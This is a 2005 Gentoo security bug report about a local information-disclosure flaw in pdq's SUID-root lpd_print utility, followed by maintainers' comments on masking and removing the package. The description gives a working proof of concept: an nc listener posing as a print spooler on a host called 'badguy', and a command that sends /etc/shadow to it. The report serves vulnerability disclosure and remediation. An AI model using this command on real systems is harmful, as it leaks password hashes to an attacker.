Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 84647

Summary: net-print/pdq: local information disclosure
Product: Gentoo Security Reporter: Sune Kloppenborg Jeppesen (RETIRED) <jaervosz>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: enhancement CC: lanius
Priority: High    
Version: unspecified   
Hardware: All   
OS: All   
Whiteboard: B4 [upstream+ removed] jaervosz
Package list:
Runtime testing required: ---

Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-03-09 10:32:33 UTC 
The print system pdq includes a few utilities which are installed SUID
root. One of these is lpd_print, a program that sends a file to a
remote print spooler. It lets the user choose a data file to be sent
(the -f option), but it doesn't check if the real user is allowed to
access the file.

The local attacker might use another machine to act as a fake print
spooler, eg.:

  badguy# perl -e 'sleep(15);$|=1;print"\0\0\0\0"' | nc -l -p 515

Root privileges are needed to bind nc to a low port. The attacker is
now able to send any file to the remote host (badguy) and have it
displayed on the console:

  victim$ lpd_print -f /etc/shadow badguy


The vulnerability exists in pdq-2.2.1.

Pdq appears to be no longer maintained. I've tried to contact the
author, Jacob A. Langford, with no success. It seems that both of his
e-mail addresses that I was able to find (langford@uiuc.edu and
langford@karman.tam.uiuc.edu) are no longer working.
Comment 1 Matthias Geerdsen (RETIRED) gentoo-dev 2005-03-10 11:59:43 UTC 
- ebuild has hardly been touched
- SF project page doesn't indicate any activity

Not totally sure how widely used this is (gentoo-stats lists 2 systems which have it btw), but maybe we should consider masking it if nobody comes up with a patch.
Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-03-27 02:05:39 UTC 
Heinrich please advise.
Comment 3 Heinrich Wendel (RETIRED) gentoo-dev 2005-03-27 04:35:28 UTC 
i'm for masking it
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2005-04-02 02:43:37 UTC 
Declared public by discoverer (Michal Wojciechowski)
I agree we should mask it.
Comment 5 solar (RETIRED) gentoo-dev 2005-04-04 08:52:18 UTC 
net-print/pdq is now package.masked in revision 1.3792 per request.
Comment 6 Thierry Carrez (RETIRED) gentoo-dev 2005-04-04 08:59:06 UTC 
Will stay masked a while prior to complete removal, moving to enhancement scope.
Comment 7 Robert Paskowitz (RETIRED) gentoo-dev 2005-05-16 14:55:45 UTC 
Probably about time to remove this from the tree. It's been masked for over a month, and upstream hasn't made a release for over 5 years, so I don't think it's going to get fixed.
Comment 8 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-05-18 22:34:28 UTC 
Heinrich are we ready to remove this from the tree?
Comment 9 Heinrich Wendel (RETIRED) gentoo-dev 2005-05-19 07:16:28 UTC 
no objections here, do you remove it or shell I?
Comment 10 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-05-19 07:24:14 UTC 
Heinrich please do it.
Comment 11 Heinrich Wendel (RETIRED) gentoo-dev 2005-05-19 07:28:37 UTC 
removed pdq
Comment 12 Thierry Carrez (RETIRED) gentoo-dev 2005-05-19 07:38:55 UTC 
RIP